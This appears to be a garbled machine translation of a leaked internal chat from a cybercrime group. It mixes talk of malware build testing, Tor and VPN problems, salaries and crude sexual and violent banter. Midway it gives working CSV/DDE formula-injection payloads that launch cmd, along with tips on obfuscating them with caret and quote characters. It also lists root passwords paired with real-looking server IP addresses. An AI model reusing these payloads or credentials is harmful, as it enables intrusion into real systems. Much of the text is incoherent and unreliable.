get drunk, forget that he is an IT guy and then act. To not lure, just kill, and all write on the WAP to Ruben in private... Deimos is not flying. Mos normal, Phobos normal, not on Deimos... on Phobos. Reply from 5.255.255.5: bytes=32 time=57ms TTL=243 Reply from 5.255.255.5: bytes=32 time=50ms TTL=243 Reply from 5.255.255.5: bytes=32 time=59ms TTL=243 Reply from 5.255.255.5: bytes=32 time=51ms TTL=243 +ping benny let everyone write me in private; if anything, there is #announcements, in the spam of general chat everything will be lost [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=0000FB382CA9FFFF) I think you need to make some chat for such important things, there is for example announcements @all Please do not litter the ether, Ruben asked an important question, there is an audit of systems, check corp VPN! I don't need to tell you anything, we'll die of hunger if I knew [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=NhCGdXGzRZsCQdd2e) tell me the secret, what's the phrase? a duck call is needed, like for a duck, but with the appropriate phrases. Does anybody use VPNs deimos, morf2, morf3? How to lure a girl home? Checking to see which ones aren't being used. We shut them down and wait for someone to complain. If anyone does not have a working VPN, write to me, I'll turn it back on. hi all girlie thighs in teriyaki sauce and with nuts - tastier! angelo already cooking with pigeons and bums) Frances did not run?):D mda horns and hooves will have to get themselves linden honey ... I was thinking about Merkel, I was dreaming about it. Oh yes, I like it on top. 
Well, just on top, so that it has a crusty crust, I thought you should grease it with mayonnaise.oh times, oh likes us, we're specialists, we'll fuck a woman, and then we'll do the rest in a circle for the eveningNo, don't touch them, they're for meat, when the pigeons and bums are done...ok, I'll put the scotch back No, they will sleep later, tonight...can I fuck the girls while they sleep?)) I mean boy? I'm in the 5th What 6th office? The office will be cleaned up later. Bones from homeless people, feathers...no, better not, you can catch bird flu from them. If you come closer, I'll break your arm. I haven't had angels for breakfast, they say it helps against all kinds of omicrons. I should have just refreshed the page. Does it work for everyone? You could also make noodles. Why boil pigeons? You can just eat them raw! The older the meat, the worse it is. So the angels in general in fact rubber or have to cook half a year they are probably very tough.I - angel want to try..... have you tried it?.And people taste good?.I want to try Wombat and DolphinNow that sauces, and here the banal boiling in salted waterNo chicken. That's for sure. I tried it in Paris. Chinese people. They put everything in the sauce there.... And I've had frogs... Speaking of pigeons, I've tasted them, it's like chicken. Only there's almost nothing to chew after eating pigeons. 
I'll clean my desk of feathers, do not worry @ruby do not fall down the office. I'm in the office the fourth day and there are many of us; left of my desk someone is finishing a homeless man, on the right the pigeon is being dealt with))))) Reply from 5.255.255.5: bytes=32 time=50ms TTL=243 Reply from 5.255.255.5: bytes=32 time=59ms TTL=243 Reply from 5.255.255.5: bytes=32 time=51ms TTL=243 meilu agent, you were fucking awesome) compile with all components; switch to another operator who can analyze your logs and make your connection better. tech support Tor, tell me, will Tor always be like this now? wild connection. This only applies to machines on the farm. i think it applies to those who have their machines on the farm. Only those on the farm, or does everyone need to fix the configuration? Who's testing our crypts on the farm, please contact @gator. We need to get your machines configured. @all It's relevant! The question was raised and immediately closed - that's the main thing, and these DLLs have nothing to do with us anyway. where to talk about our underpants? Elgo, I understand that it should not, thanks for the information. Removing these libraries from machines is not needed; on the contrary, it's good that they are not there - it is immediately visible that there are dependencies on non-standard libs. That should not be ... Specialists know better) well, the system is being completed for the first time, to start the bot)) False) well, as he explained `dll not found - mfc140, probably. The OS is not installed properly. Copy these dll can be from another machine.` for the purpose, the library owner will not install for our software.... @dane crypts should be built with /MT. That should not be. today dane dumped crypts, there an alert flashed at start-up due to lack of vcruntime140.dll and mfc140.dll, this magic I mean)) Do not know what magic) the dll you mean to put in system32 and SysWOW64? To all testers attention! 
Who's testing our crypts on the farm, email @gator We need to correct the configuration of your machines. @alalMy messages are being written to, but my messages are hanging...Some kind of freaky failure was with the connection not let that bot !or maybe they are ignoring me :face_with_monocle:yes it's obvious that otr is trying to update, but the contact after about 5-7 minutes still off@brent not seen the outlet in the toad for a long time, or he appeared by evening@Garfield aha, so, usually already otr not updated or do not want to communicate with me :triumph:can be sort of online, in fact there fly out yet? you write them when they are already on off? doctor ignore me! - Nextpisuya emptiness is not the first person about the messages - I can not say exactlyokovyletnyh happenzametil that people fly out of the zhaba often and do not see the message occurs danaya bug at you?King-cong) pongpingU Amazon in the agreements prescribed case of zombie apocalypse or starterik remake as in my childhood )yes, long time need to take Saiga[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Ktis2zHj8cpwDYtnx) also think, no weapons or stew no ...(It's like, mountains of corpses (decomposing) cause the formation and spread of many diseases and other viruses, bacteria ... But here everything is civilized, there is a small line, the morgues are full. Everything is civilized, turn by turn, and at the same time to the fullest. Someone is gently cleansing the planet. )How not to blow the zombie apocalypse, to buy stewed meat Zombies are a thing of the past) I can already see zombies in the street If money is invested, then only in this industry) So there is no time to bury, in the morgues, the line reaches 7 days Where are the mountains of corpses? 
)I sneeze in the morning and cool in the evening )Captain Trips )I want it to be like in Opposition )It's not serious. Pandemic is a disease for followers of the WHO) Lucky people, they never cheer for pandemics. jabber plz jabber plz This is not 55+k to buy)) Let them ban it - it's easier to pay back) @rags, you fucking found the guilty ones. What's the noise and no fighting? Yes, now it's clear that the Tupino government is in cahoots with the Americans and follows all their orders. They did not store cryptocurrency on the blockchain.com wallet like suckers. Cryptocurrency is likely to be banned, up to and including criminal prosecution, but thanks to whom? Revil. Thank those guys who were smart enough to withdraw money and store it in a warehouse in their apartment, and now we have another headache to withdraw our money in real. Bystrykin sat down and thought, "Well, I think it's the dilettantes, but there are non-dilettantes," and I think he's afraid to imagine what it's like. =):metal::vulcan:+++) I'm there hi all @all hello everybody, ♪ who's up for it, write in person ♪ salary. correctly says: You need a secure PHP for 5-10$ and deploy https://www.wireguard.com/ for me. If you want it to work, just deploy autoinstall scripts in one click, then get a public one, something with a good reputation. the only way to get a secure connection is to download and configure your own. pgotonvrn worked, stopped. find some cheap (or better free)) vpn; google search gives the same thing, only with registration. it says I am not 18 years old, how to watch without registering at google? 
https://www.youtube.com/watch?v=nhVs22Fkakw repeat for @angelo [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=bt99Hqwbe4gHMTRok) right you say) so i wrote that i meant VT-x, i made a mistake in the expression, i did not notice that. and Hyper-V happens, they write it instead of VT-x in the BIOS? it's like the story about how one developer of "Russian" servers put a hypervisor with virtualization in his UEFI and sold many such servers to a three-letter organization. It was funny when they found out that they cannot run a guest OS on these servers. i meant virtualization, it is enabled in Windows and VirtualBox supports it too. Hyper-V is a Windows virtualization interface; in UEFI, virtualization is enabled, not Hyper-V, and VT-x and VT-d are needed to run a sandbox on a virtual machine, as it is not easy depending on what kind of VirtualBox you have and what guests. you don't need VT-d technology for SLAT? i googled, not all VT-x processors have EPT. yes, i have VirtualBoxes, without it they would not start. in UEFI, is Hyper-V enabled? what kind of CPU? 
if i'm not mistaken all of these virtualization goodies should be supported by the processor itself. Windows writes: You do not have SLAT (Second Level Address Translation). why? I enabled Hyper-V but still can't get it to check the box in the Sandbox. To the 3Dfbvcdertgh Download archive itself: https://qaz.im/load/z2snKh/hEG76A Delete: https://qaz.im/index.php?a=delete&q=199378600 Password: nAK7Tefa733ysiyQ2B4trZ7RZsDbGbkYDZSh52h2Q8h6 My work account ran out of credits. privet @demetrius check the rocket settings, maybe users can share access to delete their messages to erase all at once. It is sad if this process will be implemented only by deleting one by one. tcp2hackers_conversation. I wonder how they technically implemented surveillance? Looks like a complex that worked to capture unencrypted traffic. 
The conversations among the group viewed by WIRED reveal at least two members appear to be based in Belarus-during the summer of 2020 when Belarus shut down the internet Stern said that one member, a coder called Hof, would not be online until "the internet problem in Belarus is solved." The ``Belarusians are busted. The messages were sent in the months before and shortly after ``thx https://www.wired.com/story/trickbot-malware-group-internal-messages/ ``Where did the firewalls come from? etc.``(git) people had access to the infrastructure like that before the shutdown of the trikbotgorbachev.jpg) On August 20, 2020, the chat logs-provided by a cybersecurity source with knowledge of the group-showing Target briefing Stern on how the group would expand in the coming weeks. ``` no otgswetlaks.jpgdok long time ago such thing is on sale alreadyooooo :point_up:and every average person at once will say "oooo... "write more such in the press release, cubit processor... Quantum processor with QLED-monitor) ok, got it cube just there are no screenshots there, jast may think that almost always the insider is a leak, but not some "super-technology, the drone company Virgin decrypted the correspondence of evil Novgorod hackers with their branch in the office of Satan using a neurocomputer on a 648-bit quantum processor "and where are the screenshots there? no, if this is a real screen leak, will be again many general phrases and a few details designed to emphasize the plausibility.and then dump it, or how to up a bit before drinking as they laughed from the hungry workers in the next plum info will know how the bosses are discussing how not to give zpa to rabble pigeons will have toada then call it, do not call it no)) F? thought to call someone yahoo) ktulhu almost called all a bit on edge, just kidding, bro you answer @patrick in the thread. i don't want to jerk off) i'd rather let them jerk off and get it over with. guys, stop. the joke was on Kerr)) you made that up. 
i didn't say that. But to skip jokes that I suck myself, I'm not ready either)Elliot, even I'm used to communication Kered I'm not negative at all, you reacted in a way I think you should not)I boiled? when watching tubicata too easily boiled in a conversation where there are over a hundred people. It's like if you shouted at a wedding and a guest from the bride's side responded to you. You didn't seem to ask him, but it's a common room and you shouted, not whispered in the ear of the mate. Don't flare up about anything, whether I responded or not, someone said something, group for all, don't like my response, ignore it like most did, no one will notice anything. ) I caught the kernelpanic 2 times in a row@all with someone suddenly restarts the mac? or even turn it off for users about tits pussy, etc. Let it be betterhere are often highly specialized questions begin to solve. need to stop this practicekei-then forget it) do not understand) it is not about identity, and in participantsha conversation in general, I emphasize, chat, belongs to you personally and the subscriber, or all?When the general chat becomes private, then I'll gladly listen to your reprimand for what he wrote in it.I'm saying that our society is impersonal enough to feel seemingly independent from one another, yet we're human, and some of us are even friends with someone, and some of us just talk to strangers without thinking, and there are those who fuck off, oddly enough, there are people here who can tell me "fuck you" guys, guys there's not enough to fuck up. 
Did you ever notice the difference between "fuck you" to your best friend and a passerby?I don't know what the fuck your relationship is with each other, I don't think I've picked on you at all, but if I have to, I may have rested on the cross, his daddy was a big shot, and he blabbed how much iq do you have as citizens or kuarkods?it means that such a person has a fucking back and press lolvot why eliot wouldn't jerk off even applaud that IT guy who could give himself a blowjob read even me. reading in and of itself is not a waste of time Kermit you know who?! krabs? he's still hunting for a recipe? he was reading on the subject - how to give yourself a blowjob not salt Krebs :/:rofl:not to snatch in the fuck, agreed he kind of practiced in this question or at least be flexible as KermitTo come in a vagina must reach the right levilkonchat need vaginas !but i agree, it doesn't change the point)) pickupmasterone like i don't jerk off, i don't fucking throw my tissues out of the car eliot like he's not an i.T. guy?and the dough is stolen when my subscription to pornohub expires, and the wankers do exactly the same thing that the local pentagonists don't like!and in between porn sites they deface the pentagonping it's just that all your IT people avoid people, sit in the dark and pimple, eat doshis and jam, jerk off without getting up from their chair and spread napkins around the place. the rest I'll leave to Kermit if I remember correctly the canon. then fucking geese is to rob and kill first) oh what a bird, what will we do with it?! First we'll eat and then we'll fuck! -Geese or pigeons, so take a pigeon and go to the chicks, chicks love them, even simple communication is mutually beneficial, although the benefits are not material... Kermit, you're right, the eyes are burning, for a bowl of soup you her... 
i don't know any relationship except the market, normal, whatever he is hungry for, it's for money!babi hungry student give and still as it dai babi again do not give pigeons to eat@patrick I liked to watch on the big screen about space bomzhi et moezp was not, and judging by the black circle at Franz, will not)I think this rule applies not only therezp was or on the homeless switch?) do not want to say anything, my personal opinion. From the words of the most common policemen, 90% of the information is slivangelo, there are mostly classics, no porn, kids around, onyon-servac at the same time made you screenshots will not show:joy:but the nicknames show that someone's screen was leaked this way it usually looks like "i heard something but i don't know fuck all about it but i need to make it look important" they just need to change the servers and it all says i dont know what organization is mentioned there, some nicknames, some kind of general words@elliott bosses leak other bosses. if there's something you haven't watched yet from cooltogoda, projector, downloaded from rutrecker 400+ movies if i know anything about such things, such information leaks first, there is little information, but a lot of fog and images of omniscience, second, the most common way to get such insiders is to monitor someone from the inside....lolpryshaya assholes in 4kPornohubThe Big Bang TheoryClinic no movies what to watch on it? projector made? finished home theater on the Malinka 4, diagonal 100 inches, consult for free)), contact as always, no protection from the fool I know a guy who leaked the password from Citibank for 100 bucks to one idiot, who fell into an elementary trap, the human factor, yesvery business, absolutely everything ruins the human factor. I wonder where the fuck they get their keys from, They sit down to write, and after a while they find a zerodei, and quickly use them. As I wrote, I believe this is true. There were holes in the rocket, by the way. 
Well, and mice, yes, no one canceled. Only they always miss the point of crisun in the team and agent, you can write a lot of things, but how exactly they only know. and the fact that we here think that they have a mega there nabobotka bullshit there, somewhere fools just punctured and only now will understand. but why write an article if they were not taken that so hard to zadeanonit with the keys in hand and all the traffic? i don't believe it)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=mCBHYDWiZ3C9JmsYo) paris is worth the masses, with pipelines sorry they didn't get to the collapse link above@frances saw the trauma route on sadoviykontora writes)i guess they sit for a while recording https traffic, encrypted, then they fuck up the keys and quietly decrypt everything. You don't work without a warrant, you put links to files on public resourses... It's all pouring out... Judging by the info, there was a hijacking of the toad... I'm telling you, less information in public channels... it does not work that waytoo much toadservac in general a long time ago to change or teleguetatak leaked toads, i guess i'll go to greh. shit you should thank me for the dicks ! that's what i say, write less information in public channels ...yes, u.s.a. don't bullshit, just wait. Kermit, I read your Russophobic speech, I'm sorry, I won't treat it, your right The pindostan has destroyed too many countries, including my homeland, to forgive it. https://www.securitylab.ru/news/529411.php You should rename Voronezh to Carthage, and what is Carthage? Let's wait and see. 
If this is the hysteria of the pindos right now Carthage must be destroyed, it is up to everyone's throat, their hands are up to their necks in blood for 30 yearsnadoado bomb Voronezhblin, Kermit, it was taken right off the tongue, especially the citizens of Russia will not feel sorry for themselves, lolkreml will respond after the Olympics, no one will feel sorry for themselves, so i think it can still go down to 36600ada i actually just looked at the platform, ok, i'll see what i had a glitch temporarily, the tor browser itself)) basically no difference, just started with bold text highlighted applause )) plain text, no fat and italics_and before how was it?)_yeah it's the browser seems to have glitched it's not me I can skype a screenshot, everyone in the chat has bold nicknames with no spaces *there *for example *but it's for text only. the nicks aren't getting fatter, they're starving... what's the matter with you?)and it's not a threat at all * everybody get up* thanks, friends, thanks, we'll be back again we've torn the guitar, we've broken the drums * stormy applause turning into ovation*)) clap the band Cybernetics-amateurs finished their performance man and cat will accept the powder better with money the snow white color makes the soul sing the powder is wonderful, it brings people luck ** doctor will come, will come, will go through the snowy plainwhat's up with the zp, didn't they bring it up? man, that would be an impressive number of course, but no net from below? 
the neighbors haven't flown by yet, who are upstairs; one and the same static space, what can you see out the window? [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=SHcieibRSmKezegkj) are you deanoning without a pinky toe, with the door? with laziness we fight our own war, stop it [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=3AvbE6HaHAQCvdnRc) well here veldon suggested that you go to war. In Ukraine or in Ukraine? Yes I understand, everyone wants the WP, and any method is good ) guys, we have working correspondence either in a closed channel or via LS. I bought boots, I'll get to Fashington) you send me the salary, I'll tell you. if you need a macro that runs the file, I can give it to you, but there's 809dat. There's also a security warning that Excel will probably give out before launching, asking "include links yes/no". The first one doesn't work, the one that doesn't have ^ and ". @ryan "Excel will run a calculator with a notepad" doesn't work. Ruby, if you need to obfuscate it, you can write a bunch of ^ and " characters inside the command line. For example, like this:

```
DDE ("cmd";"/C c^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^alc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C c"""""""""""""""""""""""""""""""""""""""""alc'!A0
=cmd|' /C notepad'!'A1'
```

You're all grown up boys, you're coping with your own hyperactivity; in the chat room it's a sure sign of a starving society)))) [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=XDPFzib3Mk6y7BawH) so you're our helmsman, only AMFROST the wheels, you shit everything up! 
Dima can't manage to wash our stables. >Quotes are clean, answers are not clean. it's already being cleaned. Somehow it's been cleaned. Quotes are being cleaned, answers are not) [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Atn7izfLA89eXM7YX) but can't you automate it somehow with cron? interesting property... it either cleans files every day, or histories) [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=AEwqDqgcW5gDbhWHp) it's selectively cleaned. but the schizophrenia joke would be great. guys, is the chat's history not cleaned now? the bong was taken away from Kinkong) sorry @ruby @ryan :rofl: ahaha the little steam engine took the steamroller:D)) ryan and gbue are two different people ) ryan asked) before he asked who would do it. you asked a question, you answered it) glue it if he's so sunglasses:lol why do you do it to yourself? it's like a psychotherapy course, you need to voice the problem to get to the bottom of it [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=X2ohYNRveqBmaHiKs) are you talking to yourself?) [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=X2ohYNRveqBmaHiKs) knock down and obfuscate. you're dry https://www.youtube.com/watch?v=0Vi-4CvAvWQ want me to be a Demon:joy: [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=cRMbNdAsfPunJcs9C) compile, a CSV with payload does wonders! of course, and about friends and how important it is to help each other, about the locomotive?) want me to sing you a song? Sukhorukov again in the mud at the clowns / presidents. did not see that e2e was turned on, it just does not work in conjunction with e2e. OTR all limps?!?! Need a test file test.csv for this exploit to test? 
Then just save this code in the file test.csv

```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
```

Excel will run a calculator with notepad. pereepid19) What do you need to do there? https://github.com/kn81/csv-injection-payloads-master [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=e2GfGSuearK5dDKDg) then you need to hang in kilograms [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=YazBAXp3p9XetNWQ3) dunaev collar [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=g4DvgB6dswkD2eKwu) what are you doing? pouring 4 GB... I wrote in LS. + @all Hello All! Friends! Urgently update your work in the git, will check before issuing ZP! broke the package builder or the packages themselves; I decided to update packages via npm install --legacy-peer-deps, and how to return everything back to work, and not one PR root 194.15.113.155 123qweASDzxc root 162.55.32.153 KLwhVjkixqXvwcvvfwNx root 80.71.158.106 Gk602noP4Mkc root 148.163.42.213 ejqXPk9nxfwi6Cy root 188.127.235.177 hMtVzuj9GHV6 root 185.163.47.176 ohnoo_m3Ooqu root 23.160.193.221 ucdhsumhjxys root 5.255.102.10 40ed30fa3d141abe1fbd45f88b361e0d root 185.16.40.99 123qweASDzxc10 wpcdhsumjxxys root Garfield Is this a bot? )))))))

```
7:35 PM yes, by the way, who was chosen as the employee of the month, who decorated the honor board of our team?))
```

```
1:05 PM ah, by the way, who was chosen employee of the month, who emblazoned our team's wall of fame?))
```

collin and guapkot you blew it ) yes, by the way, announce who was chosen employee of the month, who adorned the honor board of our team?)) Oh, a very good point. I agree. Main thing, bro, don't get drunk! I'm fucked up today Rocket! And you have a good time bro! 
Have a nice weekend))I can well assume that in certain circles this syntax is possible :nerd:is there any slang in which a credit is a credit?)yes, I cut it down, then I read it myself and thought that in the local slang it was for many in the first place))Garfield not immediately realized that the credits are loans, not loans ;)not only from usury should banks have income. They need to expand the "rabnet", the analog of botnets, to show who has power and strength here, I think they need to block all the accounts for show.Garfield that's what I mean - why can't they just write it off, without the block? Yeah, banks are fed up with selling their loans with credit cards. They seize my property for pennies on the dollar, a few thousand if I owe them. By the way, once upon a time, long time ago, I worked in Tenkovo) *for 3 whole days*))) - The idea was to call potential customers and buy them services - where their personal details came from - I don't know - they just gave them away, of course, because of some 6,000 rubles to block all accounts, they leak the databases and resell them, the databases are easy to find anyone, let alone personal details))) if they call from prisons and know your name... Bailiffs tried to block my accounts in 2016. I left here in 2011 from another city, there phone (wired) left the new tenants. So they all these years for the body did not pay, and I have accumulated as much as 6000 p. debt. In short, the bailiffs then did not get to my current accounts, and got to them. There I supposedly withdrew all the money when I left. But somehow, by some miracle, 1000 rubles was left, and that's how much they wrote off :) But now it probably will not work, because bigdata on all users began to collect.Ie, now hide from big brother in the classic banking system is not the fate of all banks now collect bigdata for the special services, as far as I heard, all drain, as connected to the common system. 
or rather bailiffs send letters to all banks, they say block it, and banks make decisions @ Garfield most likely will not leak. But there is usually a ridiculous limit. I think it is unlikely that they will leak anything out of there. i did not use it, i tried it out myself, it's OK. By the way, the money comes normally to the virtual card? if you create it in Sber, for example? Who tried it?? Does anyone have experience who does not leak information to bailiffs? so i now think about tinkof - they are almost ahead of sber and Wtb all the information disclosed i made tinkof as something on recommendation, for themselves. I think now I am thinking that they are almost ahead of Berezniki and WTB all the information has been disclosed. tinkof made it for me as a recommendation, for myself. purely as a payment wallet in shops, as I was assured there can not be any write-offs by state agencies. and I had a fine not paid, which I forgot about and already bailiffs passed all this business. so my tinkof card without balance in minus, I even did not have time to use it much, something paid a couple of times, the balance was 100 rubles may> by the way, is the tinkof card better than the Sber? (like the commission is less and when exchanging the same amount of BTC comes a little more dough)? > In general, Sber and WTB and similar banks are not our option. I`ve never noticed. I receive both on Tinkov and on VTB-card, I did not notice the difference. I only use my Spurbank card to pay for utilities/telephone/internet. In this case, the bank would have to pay more than 10 thousand rubles in it.otpadu na chastaga) is not a manse si pas sys magazine fed the former deputy of the State Duma for food fund help owners exchange office came the payment from the exchange office with the label - Charity, Milone will breed polittsrach) well the successor nevertheless, in every way immortalized the statesmanA "In Russia, Blat ... "Well, I don't think Russia is the same without GDP. 
As long as GDP rules, we will not become bananas.i think, when did they manage to declare themselves a federal district? i thought it was an enclave of Belarusians headed by the local Bashkirian PapaBashkiria it looks likeWhat is the RB in Russia? Or is it the RB which is in the Russian Federation?)General coronation is that's what I get the joke, ok ) I say just in case who wants to rest and work tired, you can pay for your own account, but I'm not sure that everyone can, there are critical projects where you can not downtimeada I was kiddingmy soldiers good luck pay state employees, we are not state employees Government does not say that here is money dear, take a walk on them yes and no holidays it guys, we do not have holidays> And how your stock of homeless? I replenish for the winter, all beer at the expense of the institution! How do we work on holidays? And we have a general strike in Belarus on Monday:zany_face:I really hope that we will continue without fines, and bonuses at the expense of the institution will beThanks for this, I see that the financial responsibility and my shouting work, you get together and more responsible, someone forgiven despite the breaches, just a hand in my face, and I just gave up) respectukha guys!)There were petty fines, but I do not want to focus on it, they know who works well, not just them. thanks for the good work, give a $500 bonus to both of you:partying_face:ryan for taking the initiative with the new delivery methodcolin for overcoming the bouncing and for pulling the project in such difficult conditions. @collin and @ryan will share the title of employee of the month between them @garfield how is your cat doing?friendship won)) ah, by the way, who was chosen employee of the month, who has decorated the team's wall of fame?)) Really, what are our options?) topa teaneck what is our option? 
it is necessary to make myselfa generally sber or Wtb and similar banks are not our option essentially) dakstat, is tenkovo card better than sber? (the commission is lower and the exchange of the same amount of BTC yields a bit more dough) and what's the holiday?)I shook my shoulders yesterday :rolling_eyes:overloaded our spaceship does not fly))) well, the law of preservation of online:grin:you come in Frances kicked out, the fuck you broadAah shit, and rebooted the router? fixed! record - 3 times delete Tor B, 2 times to change the VPN and 3 times the bot our shamanic prayer rite held? yes it starts oTaka ::scream:Praise to the botWho is burning WP can send purses, the main thing rocket not put me :sweat_smile:tor connection all right, but shit did not gruzilon same time I wrote here as that not so long ago. I had a similar bug - solved by changing the configuration of the VPN, I connected another. but it was not with the rocket was all tried everything can not enter the angel in the morning if I understand correctly, then elroy has a problem with nodes .. that is, with communication with them...it's kind of interesting for relays, `apt search nyx@elroy , and you try to manage torus chains with *nyx*@demetrius, there's nothing with the connection... Look in the toadInstall one, in different places just put it...and it is not portable? Download a portable tor browser, it will make a new chain in its directory. I can't get used to tor-browser with direct output, @elroy tor-browser is updating itself or you mean tor-chain?Yes so far so good it seemsObnovitorya that once again one with a decrepit rocket and all is well? We can not wait)) Urgently leave for an hour, I will come back and start paying wages Good news on Friday morning) Good dayGentlemen teamsters - waiting for updated information on your subordinates. 
If anyone has any sanctions - please let me know:) Today paydayGood morning.good morning In 500 + posts, all written and nothing to addWeird, and silence..... :)yesGroup of blood is on the sleeve, my serial number is on the sleeve, Wish me luck in battle, wish me luck in battle: Don't stay in this grass, don't stay in this grass. Wish me luck, wish me luck! (Tsoy zhivyf pakanado at them with a request)Angela to Merkel flew?)yesterday 500+ messages in the chat, it was scary to readnu at least 3)alive there?) pongping `Uncle Ghenya - Without Rules (final) `)) in touch @rags you too danke. In the subject)):smiling_face_with_3_hearts:oh yes what:kissing_heart:clearly)mutual)evening)thank you guys for a good)) similarly, the old track just go to sleep)so okay, all am good morninga hz, do not follow him)something like noisy by the way, "here and all. so what" track time - no it sukby would be good) let's write) about hair from the ears you can write a text ... interesting gettings)so the old age, here it comes, and it seemed yesterday still was somewhere beyond Everest ahahahaha)))) and if hair grows from the ears this is daaaa:grin:ping fuckin(ping))) the beard is nice to a man, but if there is no beard it's no problemIlya Slovesnik like a man's beard)a beard on birthdays in kindergarten sang edith piaf under the sky in Paris dont know it cheep chep chalyari pro ducklingsUnder the sky in Paris my caronka on accordion was when tov kindergarten sang in french at school "On the merry ducks" and also Edith Piaf. 
I learned the frenchman also adriano chelentano where would the powerhouse be if there were no you)et si tu n'existais razDessan theme also frenchmen for the judgment of society?joe dasseypian the author will throw you here in a chat:grin:it's just a fantasyJim made Beam like :rofl: but the idea is eternal so there is only here, and the rest, what could be -:thumbsup:all this in 21 we will leave those who in our past awareness of that year existed, so let there and fuck up who you in the past))i.e. i.e. the conscious choice of ass - as a certain hopelessness itselfNo, it should be a conscious choice as less often as possible. kick it or fuck it up like a snowdrop sometimes there is no way out but life is a thing yea, you're right it's ok for yourself, the main thing is to have time planned for yourself, i think so, otherwise ugly :roflI'm already running out of viskarek. Self-education is just for me, it's not a pain, the problem for me is to form an answer, or to perceive it by ear, it's not a problem to speak English, nothing is lost) and not gained)well, all in all my wife is busy with the child. or is it better to leave everything as it is :grin:1 pedagogical 2 philological:)she has two degrees in english my wife studies guess who))) guess what it is:rofl:bitcha actually there was candy and dreamsbeen searching for the words can be a dreamheard something interesting decided to practice on the music ok I sleep all happy january, love all) fucking study inglishvot so ... 
how many fans of the beautiful genius among us it turns out)audiomaniac:japanese_ogre:))) I agree with the fact that he just fucked up in this businessa I do not agree that he is powerful(but not really)and it's like he has a copyright theme :thumbsup:yes too powerful man `https://www.youtube.com/watch?v=uWbBSGAYns8 `sekili wo:joy::grin:this spoiler immediately looks at you, as on shit)) or so "we fucked all of you in the mouth it was izi "maybe it was written not to sound egoistic =)so who is a pro it is still a concept to themselves here we have generally other keys in the profession)) but fuck these professionals here all not a proyou can play with even higher qualityWe are not professionals in the description)) no, suddenly the fuck the author is still alive and ask john stump. their hands are growing with geomtric progression)))) \How can you create this is the question of a million))) 4 is not enough just did not get there)) `https://www.youtube.com/watch?v=_5FFYMe-MGE `in four hands?) I threw a link as a Death of a Pianist - 2 hz how can you play this also normal there is such a movie Pianistebane just like his game.t live `https://www.youtube.com/watch?v=_5FFYMe-MGE` there's also a sheet there about how art is real, genuine changes anyone and makes you feel, no matter how hard you try to resist. and the bully was fucking with the eternal scales because of the stench)) john stump waltz of the dead John stump waltz of the dead... John stump waltz of the dead... John stump waltz of the dead... https://www.youtube.com/watch?v=ynEscyMdIjg... Noonono or notMaksimov seems to be something like this myself... I found one verse by heart from school, Eagle I remember who the author also came in about the fiddler and the neighbor hooligan on TV a few days ago saw a performance. bluebird contest, there Inna Churikova reads a verse about the fiddler hooligan. 
Can not find it, but just a fire poem, the author does not remember, I just the first time I heard a workpara minute) hope to find it) fucking rebus myself did it really is a masterpiece as a man just for fun composeda I saw and heard myself wanted to, i started studying the sheet music) i'll show you something)) grieg is strong, the melody will see our great-great-(great)x*x times)) talent is a very elastic notion but he didn't invent anything of his own, they also call him a talent you just watch how she plays!//www.Youtube.com/watch?v=gSY-wD4l5DM` seems to be a normal recording from a phone, bro, you can't really hear anything in the mountain king's cave))Antonio Vivaldi's cycle "The Seasons" WINTER part 1:innocent:You should start the year with something good, something eternal. And what could be more eternal than music + https://www.youtube.com/watch?v=nYAXNq8rX0I? Let's say it all costs a fuckload of guitars to play live, and so on.there it is, you'll pick up analog to your taste (analog means live preamps, guitar cabinets) and then there's more, if you get into everything more or less, and you like itManuals on YouTube to help you with all thiszatem download from a torrent guitar rig 6 for your eyespf ukfpfsteinberg ur12shcha say around whatvneshnyaya buy sound card instrumentalpurchase guitar on a budgetIn terms starting now @Garfieldoktax if you find one throwtim straight from the soul)) what solos and .e.) from the first take) there's a video on YouTube where he plays at the stadium at the hockey game zapisalu livenu that is. i can't say anything about him in terms of live music, i told you about him. 
